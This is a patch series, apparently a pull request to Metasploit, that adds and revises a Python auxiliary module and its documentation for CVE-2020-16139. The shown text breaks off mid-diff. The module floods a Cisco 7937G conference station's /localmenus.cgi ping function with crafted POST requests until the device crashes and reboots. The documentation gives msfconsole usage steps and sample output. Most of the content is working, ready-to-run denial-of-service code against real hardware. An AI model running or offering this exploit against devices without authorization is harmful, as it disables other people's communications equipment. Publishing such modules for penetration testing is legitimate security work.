From 16a00ea3381ff0bea7b97d9758739fe21ff65896 Mon Sep 17 00:00:00 2001 From: debifrank Date: Tue, 11 Aug 2020 10:29:28 -0400 Subject: [PATCH 01/22] Cisco 7937G DoS Reset Attack Python module for metasploit that targets the Cisco 7937G Conference Station and vulnerability CVE-2020-16139 --- modules/auxiliary/dos/cisco/CVE-2020-16139.py | 70 +++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 modules/auxiliary/dos/cisco/CVE-2020-16139.py diff --git a/modules/auxiliary/dos/cisco/CVE-2020-16139.py b/modules/auxiliary/dos/cisco/CVE-2020-16139.py new file mode 100644 index 0000000000..60cb88ccdf --- /dev/null +++ b/modules/auxiliary/dos/cisco/CVE-2020-16139.py @@ -0,0 +1,70 @@ +# Exploit Title: Cisco 7937G DoS 1 MSF Module +# Date: 2020-08-10 +# Exploit Author: Cody Martin +# Vendor Homepage: https://cisco.com +# Version: <=SIP-1-4-5-7 +# Tested On: SIP-1-4-5-5, SIP-1-4-5-7 +# CVE: CVE-2020-16139 + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +# standard modules +import logging + +# extra modules +dependencies_missing = False +try: + import requests +except ImportError: + dependencies_missing = True + +from metasploit import module + + +metadata = { + 'name': 'Cisco 7937G Denial-of-Service Reboot Attack', + 'description': ''' + DoS reset attack + ''', + 'authors': [ + 'Cody Martin' + ], + 'date': '2020-06-02', + 'license': 'GPL_LICENSE', + 'references': [ + {'type': 'url', 'ref': ''}, + {'type': 'cve', 'ref': '2020-#'}, + {'type': 'edb', 'ref': '#'} + ], + 'type': 'dos', + 'options': { + 'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': 'None'} + } +} + + +def run(args): + module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost'])) + if dependencies_missing: + logging.error('Module dependency (requests) is missing, cannot continue') + return + + # Exploit + url = "http://{}/localmenus.cgi".format(args['rhost']) + data = "A"*46 + payload = {"func": "609", "data": data, "rphl": "1"} + logging.info("FIRING ZE MIZZLES!") + for i in range(1000): + try: + r = requests.post(url=url, params=payload, timeout=5) + if r.status_code != 200: + logging.error("Device doesn't appear to be functioning or web access is not enabled.") + return + except requests.exceptions.RequestException: + logging.info('DoS reset attack completed!') + return + + +if __name__ == '__main__': + module.run(metadata, run) From 18fdbfd917a9cf5688d696d0aa68d4898d85a609 Mon Sep 17 00:00:00 2001 From: debifrank Date: Tue, 11 Aug 2020 10:30:29 -0400 Subject: [PATCH 02/22] Update CVE-2020-16139.py --- modules/auxiliary/dos/cisco/CVE-2020-16139.py | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/dos/cisco/CVE-2020-16139.py b/modules/auxiliary/dos/cisco/CVE-2020-16139.py index 60cb88ccdf..bef6db8518 100644 --- a/modules/auxiliary/dos/cisco/CVE-2020-16139.py +++ b/modules/auxiliary/dos/cisco/CVE-2020-16139.py @@ -1,9 +1,12 @@ # Exploit Title: Cisco 7937G DoS 1 MSF Module # Date: 2020-08-10 # Exploit Author: Cody Martin +# Author Homepage: debifrank.github.io +# Organization: BlackLanternSecurity +# Org. Homepage: BlackLanternSecurity.com # Vendor Homepage: https://cisco.com -# Version: <=SIP-1-4-5-7 -# Tested On: SIP-1-4-5-5, SIP-1-4-5-7 +# Version: <=SCCP-1-4-5-7 +# Tested On: SCCP-1-4-5-5, SIP-1-4-5-7 # CVE: CVE-2020-16139 #!/usr/bin/env python3 From 78a7e8ae96b248f0a66dac4310b75e11b2942105 Mon Sep 17 00:00:00 2001 From: debifrank Date: Tue, 11 Aug 2020 10:32:37 -0400 Subject: [PATCH 03/22] Update CVE-2020-16139.py --- modules/auxiliary/dos/cisco/CVE-2020-16139.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/cisco/CVE-2020-16139.py b/modules/auxiliary/dos/cisco/CVE-2020-16139.py index bef6db8518..505b52e0cf 100644 --- a/modules/auxiliary/dos/cisco/CVE-2020-16139.py +++ b/modules/auxiliary/dos/cisco/CVE-2020-16139.py @@ -6,7 +6,7 @@ # Org. Homepage: BlackLanternSecurity.com # Vendor Homepage: https://cisco.com # Version: <=SCCP-1-4-5-7 -# Tested On: SCCP-1-4-5-5, SIP-1-4-5-7 +# Tested On: SCCP-1-4-5-5, SCCP-1-4-5-7 # CVE: CVE-2020-16139 #!/usr/bin/env python3 From a77931c4793c8772d15c490ee71ee99507853f2b Mon Sep 17 00:00:00 2001 From: debifrank Date: Tue, 11 Aug 2020 10:51:58 -0400 Subject: [PATCH 04/22] Update CVE-2020-16139.py --- modules/auxiliary/dos/cisco/CVE-2020-16139.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/dos/cisco/CVE-2020-16139.py b/modules/auxiliary/dos/cisco/CVE-2020-16139.py index 505b52e0cf..7cfd048796 100644 --- a/modules/auxiliary/dos/cisco/CVE-2020-16139.py +++ b/modules/auxiliary/dos/cisco/CVE-2020-16139.py @@ -36,8 +36,8 @@ metadata = { 'date': '2020-06-02', 'license': 'GPL_LICENSE', 'references': [ - {'type': 'url', 'ref': ''}, - {'type': 'cve', 'ref': '2020-#'}, + {'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'}, + {'type': 'cve', 'ref': '2020-16139'}, {'type': 'edb', 'ref': '#'} ], 'type': 'dos', From 884b0ec897043b7444c7ed6989a198035f442cc8 Mon Sep 17 00:00:00 2001 From: debifrank Date: Wed, 12 Aug 2020 11:25:32 -0400 Subject: [PATCH 05/22] Update CVE-2020-16139.py Removed jest, included more useful information --- modules/auxiliary/dos/cisco/CVE-2020-16139.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/cisco/CVE-2020-16139.py b/modules/auxiliary/dos/cisco/CVE-2020-16139.py index 7cfd048796..d54dc77530 100644 --- a/modules/auxiliary/dos/cisco/CVE-2020-16139.py +++ b/modules/auxiliary/dos/cisco/CVE-2020-16139.py @@ -57,7 +57,7 @@ def run(args): url = "http://{}/localmenus.cgi".format(args['rhost']) data = "A"*46 payload = {"func": "609", "data": data, "rphl": "1"} - logging.info("FIRING ZE MIZZLES!") + logging.info("Sending DoS packets. Stand by.") for i in range(1000): try: r = requests.post(url=url, params=payload, timeout=5) From cc7dd2179a755b330e3ad11bd5c3ea08cf0cf68a Mon Sep 17 00:00:00 2001 From: debifrank Date: Wed, 12 Aug 2020 12:34:43 -0400 Subject: [PATCH 06/22] Add files via upload Documentation for CVE-2020-16139 --- .../auxiliary/dos/cisco/CVE-2020-16139.md | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md diff --git a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md new file mode 100644 index 0000000000..4478f76308 --- /dev/null +++ b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md @@ -0,0 +1,30 @@ +## Vulnerable Application + + 1. Obtain a Cisco 7937G Conference Station. + 2. Enable Web Access on the device (default configuration). + 3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable. + +## Verification Steps + + 1. Start msfconsole + 2. Do: `use auxiliary/dos/cisco/CVE-2020-16139` + 3. Do: `set RHOST 192.168.1.10` + 4. Do: `run` + 5. The conference station should become inoperable and then power cycle itself. + +## Options + + 1. rhost (required) - Target addres + +## Scenarios + +Because both successful and unsuccessful attacks result in the request timing out, there +is no way to be sure that the attack was completed. It is recommended to attempt a ping +to the device immediately afterward to verify device is offline/reseting. + +``` +[*] Starting server... +[*] 192.168.110.209 - Sending DoS packets. Stand by. +[*] 192.168.110.209 - DoS reset attack completed! +[*] Auxiliary module execution completed +``` From b65f87e0c113a63dee16606eda11d94677a2b5a4 Mon Sep 17 00:00:00 2001 From: debifrank Date: Wed, 12 Aug 2020 12:35:55 -0400 Subject: [PATCH 07/22] Update CVE-2020-16139.md --- documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md index 4478f76308..cd6a4fdda1 100644 --- a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md +++ b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md @@ -14,7 +14,7 @@ ## Options - 1. rhost (required) - Target addres + 1. rhost (required) - Target address ## Scenarios From dada2abaadaebdea6efb96f904a0cd18713787c6 Mon Sep 17 00:00:00 2001 From: debifrank Date: Thu, 13 Aug 2020 09:52:04 -0400 Subject: [PATCH 08/22] Delete CVE-2020-16139.py Linting --- modules/auxiliary/dos/cisco/CVE-2020-16139.py | 73 ------------------- 1 file changed, 73 deletions(-) delete mode 100644 modules/auxiliary/dos/cisco/CVE-2020-16139.py diff --git a/modules/auxiliary/dos/cisco/CVE-2020-16139.py b/modules/auxiliary/dos/cisco/CVE-2020-16139.py deleted file mode 100644 index d54dc77530..0000000000 --- a/modules/auxiliary/dos/cisco/CVE-2020-16139.py +++ /dev/null @@ -1,73 +0,0 @@ -# Exploit Title: Cisco 7937G DoS 1 MSF Module -# Date: 2020-08-10 -# Exploit Author: Cody Martin -# Author Homepage: debifrank.github.io -# Organization: BlackLanternSecurity -# Org. Homepage: BlackLanternSecurity.com -# Vendor Homepage: https://cisco.com -# Version: <=SCCP-1-4-5-7 -# Tested On: SCCP-1-4-5-5, SCCP-1-4-5-7 -# CVE: CVE-2020-16139 - -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- - -# standard modules -import logging - -# extra modules -dependencies_missing = False -try: - import requests -except ImportError: - dependencies_missing = True - -from metasploit import module - - -metadata = { - 'name': 'Cisco 7937G Denial-of-Service Reboot Attack', - 'description': ''' - DoS reset attack - ''', - 'authors': [ - 'Cody Martin' - ], - 'date': '2020-06-02', - 'license': 'GPL_LICENSE', - 'references': [ - {'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'}, - {'type': 'cve', 'ref': '2020-16139'}, - {'type': 'edb', 'ref': '#'} - ], - 'type': 'dos', - 'options': { - 'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': 'None'} - } -} - - -def run(args): - module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost'])) - if dependencies_missing: - logging.error('Module dependency (requests) is missing, cannot continue') - return - - # Exploit - url = "http://{}/localmenus.cgi".format(args['rhost']) - data = "A"*46 - payload = {"func": "609", "data": data, "rphl": "1"} - logging.info("Sending DoS packets. Stand by.") - for i in range(1000): - try: - r = requests.post(url=url, params=payload, timeout=5) - if r.status_code != 200: - logging.error("Device doesn't appear to be functioning or web access is not enabled.") - return - except requests.exceptions.RequestException: - logging.info('DoS reset attack completed!') - return - - -if __name__ == '__main__': - module.run(metadata, run) From d1afe602627ace84d7137fa25d82e2ae3b79f3de Mon Sep 17 00:00:00 2001 From: debifrank Date: Thu, 13 Aug 2020 09:52:21 -0400 Subject: [PATCH 09/22] Add files via upload Linted with autopep8 --- modules/auxiliary/dos/cisco/CVE-2020-16139.py | 74 +++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 modules/auxiliary/dos/cisco/CVE-2020-16139.py diff --git a/modules/auxiliary/dos/cisco/CVE-2020-16139.py b/modules/auxiliary/dos/cisco/CVE-2020-16139.py new file mode 100644 index 0000000000..21331f9c6b --- /dev/null +++ b/modules/auxiliary/dos/cisco/CVE-2020-16139.py @@ -0,0 +1,74 @@ +# Exploit Title: Cisco 7937G DoS 1 MSF Module +# Date: 2020-08-10 +# Exploit Author: Cody Martin +# Author Homepage: debifrank.github.io +# Organization: BlackLanternSecurity +# Org. Homepage: BlackLanternSecurity.com +# Vendor Homepage: https://cisco.com +# Version: <=SCCP-1-4-5-7 +# Tested On: SCCP-1-4-5-5, SCCP-1-4-5-7 +# CVE: CVE-2020-16139 + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +# standard modules +from metasploit import module +import logging + +# extra modules +dependencies_missing = False +try: + import requests +except ImportError: + dependencies_missing = True + + +metadata = { + 'name': 'Cisco 7937G Denial-of-Service Reboot Attack', + 'description': ''' + DoS reset attack + ''', + 'authors': [ + 'Cody Martin' + ], + 'date': '2020-06-02', + 'license': 'GPL_LICENSE', + 'references': [ + {'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'}, + {'type': 'cve', 'ref': '2020-16139'}, + {'type': 'edb', 'ref': '#'} + ], + 'type': 'dos', + 'options': { + 'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': 'None'} + } +} + + +def run(args): + module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost'])) + if dependencies_missing: + logging.error( + 'Module dependency (requests) is missing, cannot continue') + return + + # Exploit + url = "http://{}/localmenus.cgi".format(args['rhost']) + data = "A"*46 + payload = {"func": "609", "data": data, "rphl": "1"} + logging.info("FIRING ZE MIZZLES!") + for i in range(1000): + try: + r = requests.post(url=url, params=payload, timeout=5) + if r.status_code != 200: + logging.error( + "Device doesn't appear to be functioning or web access is not enabled.") + return + except requests.exceptions.RequestException: + logging.info('DoS reset attack completed!') + return + + +if __name__ == '__main__': + module.run(metadata, run) From f6581b9518755204867f9aa96c8d8c8a12903444 Mon Sep 17 00:00:00 2001 From: debifrank Date: Thu, 13 Aug 2020 09:55:14 -0400 Subject: [PATCH 10/22] Delete CVE-2020-16139.md Linting --- .../auxiliary/dos/cisco/CVE-2020-16139.md | 30 ------------------- 1 file changed, 30 deletions(-) delete mode 100644 documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md diff --git a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md deleted file mode 100644 index cd6a4fdda1..0000000000 --- a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md +++ /dev/null @@ -1,30 +0,0 @@ -## Vulnerable Application - - 1. Obtain a Cisco 7937G Conference Station. - 2. Enable Web Access on the device (default configuration). - 3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable. - -## Verification Steps - - 1. Start msfconsole - 2. Do: `use auxiliary/dos/cisco/CVE-2020-16139` - 3. Do: `set RHOST 192.168.1.10` - 4. Do: `run` - 5. The conference station should become inoperable and then power cycle itself. - -## Options - - 1. rhost (required) - Target address - -## Scenarios - -Because both successful and unsuccessful attacks result in the request timing out, there -is no way to be sure that the attack was completed. It is recommended to attempt a ping -to the device immediately afterward to verify device is offline/reseting. - -``` -[*] Starting server... -[*] 192.168.110.209 - Sending DoS packets. Stand by. -[*] 192.168.110.209 - DoS reset attack completed! -[*] Auxiliary module execution completed -``` From 27d889a599e1bee4275d42390f1f8b90f86b99df Mon Sep 17 00:00:00 2001 From: debifrank Date: Thu, 13 Aug 2020 09:55:37 -0400 Subject: [PATCH 11/22] Add files via upload Linted with msftidy_docs.rb --- .../auxiliary/dos/cisco/CVE-2020-16139.md | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md diff --git a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md new file mode 100644 index 0000000000..4478f76308 --- /dev/null +++ b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md @@ -0,0 +1,30 @@ +## Vulnerable Application + + 1. Obtain a Cisco 7937G Conference Station. + 2. Enable Web Access on the device (default configuration). + 3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable. + +## Verification Steps + + 1. Start msfconsole + 2. Do: `use auxiliary/dos/cisco/CVE-2020-16139` + 3. Do: `set RHOST 192.168.1.10` + 4. Do: `run` + 5. The conference station should become inoperable and then power cycle itself. + +## Options + + 1. rhost (required) - Target addres + +## Scenarios + +Because both successful and unsuccessful attacks result in the request timing out, there +is no way to be sure that the attack was completed. It is recommended to attempt a ping +to the device immediately afterward to verify device is offline/reseting. + +``` +[*] Starting server... +[*] 192.168.110.209 - Sending DoS packets. Stand by. +[*] 192.168.110.209 - DoS reset attack completed! +[*] Auxiliary module execution completed +``` From b4689dfa2d8ea59332021088812f906f8b841163 Mon Sep 17 00:00:00 2001 From: debifrank Date: Fri, 14 Aug 2020 10:12:39 -0400 Subject: [PATCH 12/22] Update CVE-2020-16139.md WIP --- .../auxiliary/dos/cisco/CVE-2020-16139.md | 30 +++++++++---------- 1 file changed, 14 insertions(+), 16 deletions(-) diff --git a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md index 4478f76308..9b423652ec 100644 --- a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md +++ b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md @@ -1,27 +1,25 @@ ## Vulnerable Application - 1. Obtain a Cisco 7937G Conference Station. - 2. Enable Web Access on the device (default configuration). - 3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable. + [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station. + This module has been tested successfully against SCCP-1-4-5-5 and SCCP-1-4-5-7. + +### Description + +This module exploits a bug in how the conference station handles executing a ping via it's web interface. By repeatedly executing the ping function without clearing out the resulting output, a DoS is caused that will reset the device after a few minutes. ## Verification Steps - 1. Start msfconsole - 2. Do: `use auxiliary/dos/cisco/CVE-2020-16139` - 3. Do: `set RHOST 192.168.1.10` - 4. Do: `run` - 5. The conference station should become inoperable and then power cycle itself. - -## Options - - 1. rhost (required) - Target addres + 1. Obtain a Cisco 7937G Conference Station. + 2. Enable Web Access on the device (default configuration). + 3. Start msfconsole + 4. Do: `use auxiliary/dos/cisco/CVE-2020-16139` + 5. Do: `set RHOST 192.168.1.10` + 6. Do: `run` + 7. The conference station should become nonresponsive and then power cycle itself. ## Scenarios -Because both successful and unsuccessful attacks result in the request timing out, there -is no way to be sure that the attack was completed. It is recommended to attempt a ping -to the device immediately afterward to verify device is offline/reseting. - +### Cisco 7937G SCCP-1-4-5-7 ``` [*] Starting server... [*] 192.168.110.209 - Sending DoS packets. Stand by. From 0e0bdc4f984384a497e1be5d200262f59963535a Mon Sep 17 00:00:00 2001 From: debifrank Date: Fri, 14 Aug 2020 12:15:53 -0400 Subject: [PATCH 13/22] Update CVE-2020-16139.md --- .../modules/auxiliary/dos/cisco/CVE-2020-16139.md | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md index 9b423652ec..80eca0cf17 100644 --- a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md +++ b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md @@ -1,7 +1,7 @@ ## Vulnerable Application [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station. - This module has been tested successfully against SCCP-1-4-5-5 and SCCP-1-4-5-7. + This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7. ### Description @@ -12,17 +12,22 @@ This module exploits a bug in how the conference station handles executing a pin 1. Obtain a Cisco 7937G Conference Station. 2. Enable Web Access on the device (default configuration). 3. Start msfconsole - 4. Do: `use auxiliary/dos/cisco/CVE-2020-16139` - 5. Do: `set RHOST 192.168.1.10` + 4. Do: `use auxiliary/dos/cisco/cve_2020_16139` + 5. Do: `set rhost 192.168.1.10` 6. Do: `run` 7. The conference station should become nonresponsive and then power cycle itself. ## Scenarios -### Cisco 7937G SCCP-1-4-5-7 +### Cisco 7937G Running Firmware Version SCCP-1-4-5-7 ``` +msf5 > use auxiliary/dos/cisco/cve_2020_16139 +msf5 auxiliary(dos/cisco/cve_2020_16139) > set rhost 192.168.110.209 +rhost => 192.168.110.209 +msf5 auxiliary(dos/cisco/cve_2020_16139) > run + [*] Starting server... -[*] 192.168.110.209 - Sending DoS packets. Stand by. +[*] 192.168.110.209 - Sending DoS Packets. Stand by. [*] 192.168.110.209 - DoS reset attack completed! [*] Auxiliary module execution completed ``` From ffa23ba850f8f8d4feea644d44cd3eb5df1cb513 Mon Sep 17 00:00:00 2001 From: debifrank Date: Fri, 14 Aug 2020 12:16:22 -0400 Subject: [PATCH 14/22] Delete CVE-2020-16139.py --- modules/auxiliary/dos/cisco/CVE-2020-16139.py | 74 ------------------- 1 file changed, 74 deletions(-) delete mode 100644 modules/auxiliary/dos/cisco/CVE-2020-16139.py diff --git a/modules/auxiliary/dos/cisco/CVE-2020-16139.py b/modules/auxiliary/dos/cisco/CVE-2020-16139.py deleted file mode 100644 index 21331f9c6b..0000000000 --- a/modules/auxiliary/dos/cisco/CVE-2020-16139.py +++ /dev/null @@ -1,74 +0,0 @@ -# Exploit Title: Cisco 7937G DoS 1 MSF Module -# Date: 2020-08-10 -# Exploit Author: Cody Martin -# Author Homepage: debifrank.github.io -# Organization: BlackLanternSecurity -# Org. Homepage: BlackLanternSecurity.com -# Vendor Homepage: https://cisco.com -# Version: <=SCCP-1-4-5-7 -# Tested On: SCCP-1-4-5-5, SCCP-1-4-5-7 -# CVE: CVE-2020-16139 - -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- - -# standard modules -from metasploit import module -import logging - -# extra modules -dependencies_missing = False -try: - import requests -except ImportError: - dependencies_missing = True - - -metadata = { - 'name': 'Cisco 7937G Denial-of-Service Reboot Attack', - 'description': ''' - DoS reset attack - ''', - 'authors': [ - 'Cody Martin' - ], - 'date': '2020-06-02', - 'license': 'GPL_LICENSE', - 'references': [ - {'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'}, - {'type': 'cve', 'ref': '2020-16139'}, - {'type': 'edb', 'ref': '#'} - ], - 'type': 'dos', - 'options': { - 'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': 'None'} - } -} - - -def run(args): - module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost'])) - if dependencies_missing: - logging.error( - 'Module dependency (requests) is missing, cannot continue') - return - - # Exploit - url = "http://{}/localmenus.cgi".format(args['rhost']) - data = "A"*46 - payload = {"func": "609", "data": data, "rphl": "1"} - logging.info("FIRING ZE MIZZLES!") - for i in range(1000): - try: - r = requests.post(url=url, params=payload, timeout=5) - if r.status_code != 200: - logging.error( - "Device doesn't appear to be functioning or web access is not enabled.") - return - except requests.exceptions.RequestException: - logging.info('DoS reset attack completed!') - return - - -if __name__ == '__main__': - module.run(metadata, run) From 7d125c9741ede3ea850522e71cdeb1735ac77ff9 Mon Sep 17 00:00:00 2001 From: debifrank Date: Fri, 14 Aug 2020 12:16:52 -0400 Subject: [PATCH 15/22] Add files via upload --- modules/auxiliary/dos/cisco/cve_2020_16139.py | 82 +++++++++++++++++++ 1 file changed, 82 insertions(+) create mode 100644 modules/auxiliary/dos/cisco/cve_2020_16139.py diff --git a/modules/auxiliary/dos/cisco/cve_2020_16139.py b/modules/auxiliary/dos/cisco/cve_2020_16139.py new file mode 100644 index 0000000000..48d23395c9 --- /dev/null +++ b/modules/auxiliary/dos/cisco/cve_2020_16139.py @@ -0,0 +1,82 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +# standard modules +from metasploit import module +import logging + +# extra modules +requests_missing = False +random_missing = False +string_missing = False + +try: + import requests +except ImportError: + requests_missing = True +try: + import random +except ImportError: + random_missing = True +try: + import string +except ImportError: + string_missing = True + +metadata = { + 'name': 'Cisco 7937G Denial-of-Service Reboot Attack', + 'description': ''' + This module exploits a bug in how the conference station handles executing a ping via it's web interface. By repeatedly executing the ping function without clearing out the resulting output, a DoS is caused that will reset the device after a few minutes. + ''', + 'authors': [ + 'Cody Martin' + # Author Homepage: debifrank.github.io + # Organization: BlackLanternSecurity + # Org. Homepage: BlackLanternSecurity.com + ], + 'date': '2020-06-02', + 'license': 'GPL_LICENSE', + 'references': [ + {'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'}, + {'type': 'cve', 'ref': '2020-16139'} + ], + 'type': 'dos', + 'options': { + 'rhost': {'type': 'address', + 'description': 'Target address', + 'required': True, + 'default': 'None' + } + } +} + +def run(args): + module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost'])) + if requests_missing: + logging.error('Required Python module dependency (requests) is missing.') + logging.error('Please execute pip3 install requests.') + return + if random_missing: + logging.error('Required Python module dependency (random) is missing.') + logging.error('Please execute pip3 install random.') + if string_missing: + logging.error('Required Python module dependency (string) is missing.') + logging.error('Please execute pip3 install string.') + + url = "http://{}/localmenus.cgi".format(args['rhost']) + data = ''.join(random.choice(string.ascii_letters) for i in range(46)) + payload = {"func": "609", "data": data, "rphl": "1"} + logging.info("Sending DoS Packets. Stand by.") + for i in range(1000): + try: + r = requests.post(url=url, params=payload, timeout=5) + if r.status_code != 200: + logging.error("Device doesn't appear to be functioning or web access is not enabled.") + return + except requests.exceptions.ReadTimeout as e: + logging.info('DoS reset attack completed!') + return + + +if __name__ == '__main__': + module.run(metadata, run) From 9d08b293586025d0a64a8c20b753d7bc42761f61 Mon Sep 17 00:00:00 2001 From: debifrank Date: Fri, 14 Aug 2020 14:20:49 -0400 Subject: [PATCH 16/22] Rename CVE-2020-16139.md to cve-2020-16139.md --- .../auxiliary/dos/cisco/{CVE-2020-16139.md => cve-2020-16139.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename documentation/modules/auxiliary/dos/cisco/{CVE-2020-16139.md => cve-2020-16139.md} (100%) diff --git a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md b/documentation/modules/auxiliary/dos/cisco/cve-2020-16139.md similarity index 100% rename from documentation/modules/auxiliary/dos/cisco/CVE-2020-16139.md rename to documentation/modules/auxiliary/dos/cisco/cve-2020-16139.md From 9d3da31411cc49b269ac0b425179c363f68a8090 Mon Sep 17 00:00:00 2001 From: debifrank Date: Fri, 14 Aug 2020 16:18:47 -0400 Subject: [PATCH 17/22] Update cve_2020_16139.py catch unintended request exceptions --- modules/auxiliary/dos/cisco/cve_2020_16139.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/auxiliary/dos/cisco/cve_2020_16139.py b/modules/auxiliary/dos/cisco/cve_2020_16139.py index 48d23395c9..60a300d05b 100644 --- a/modules/auxiliary/dos/cisco/cve_2020_16139.py +++ b/modules/auxiliary/dos/cisco/cve_2020_16139.py @@ -76,6 +76,10 @@ def run(args): except requests.exceptions.ReadTimeout as e: logging.info('DoS reset attack completed!') return + except requests.exceptions.RequestException as e: + logging.info('An unexpected exception occurred: ' + str(e)) + logging.info('The device may be DoS\'d already or not have web access enabled.') + return if __name__ == '__main__': From 1e50ca7d30f35d33667f92a8619e09cb98f99203 Mon Sep 17 00:00:00 2001 From: debifrank Date: Fri, 14 Aug 2020 17:36:43 -0400 Subject: [PATCH 18/22] Update cve_2020_16139.py --- modules/auxiliary/dos/cisco/cve_2020_16139.py | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/dos/cisco/cve_2020_16139.py b/modules/auxiliary/dos/cisco/cve_2020_16139.py index 60a300d05b..1114a3020e 100644 --- a/modules/auxiliary/dos/cisco/cve_2020_16139.py +++ b/modules/auxiliary/dos/cisco/cve_2020_16139.py @@ -26,7 +26,10 @@ except ImportError: metadata = { 'name': 'Cisco 7937G Denial-of-Service Reboot Attack', 'description': ''' - This module exploits a bug in how the conference station handles executing a ping via it's web interface. By repeatedly executing the ping function without clearing out the resulting output, a DoS is caused that will reset the device after a few minutes. + This module exploits a bug in how the conference station handles + executing a ping via it's web interface. By repeatedly executing + the ping function without clearing out the resulting output, + a DoS is caused that will reset the device after a few minutes. ''', 'authors': [ 'Cody Martin' @@ -45,8 +48,7 @@ metadata = { 'rhost': {'type': 'address', 'description': 'Target address', 'required': True, - 'default': 'None' - } + 'default': 'None'} } } @@ -66,7 +68,8 @@ def run(args): url = "http://{}/localmenus.cgi".format(args['rhost']) data = ''.join(random.choice(string.ascii_letters) for i in range(46)) payload = {"func": "609", "data": data, "rphl": "1"} - logging.info("Sending DoS Packets. Stand by.") + logging.info("Sending POST requests triggering the PING function.") + logging.info("Device should crash with a DoS shortly...") for i in range(1000): try: r = requests.post(url=url, params=payload, timeout=5) From 3cc8e163e33e71cd5fa1f9156ab6d4396d14acd9 Mon Sep 17 00:00:00 2001 From: debifrank Date: Mon, 17 Aug 2020 20:23:48 -0400 Subject: [PATCH 19/22] Update and rename cve-2020-16139.md to cisco_7937g_dos_reboot.md --- ...{cve-2020-16139.md => cisco_7937g_dos_reboot.md} | 13 +++++++++++++ 1 file changed, 13 insertions(+) rename documentation/modules/auxiliary/dos/cisco/{cve-2020-16139.md => cisco_7937g_dos_reboot.md} (75%) diff --git a/documentation/modules/auxiliary/dos/cisco/cve-2020-16139.md b/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md similarity index 75% rename from documentation/modules/auxiliary/dos/cisco/cve-2020-16139.md rename to documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md index 80eca0cf17..568826dd57 100644 --- a/documentation/modules/auxiliary/dos/cisco/cve-2020-16139.md +++ b/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md @@ -31,3 +31,16 @@ msf5 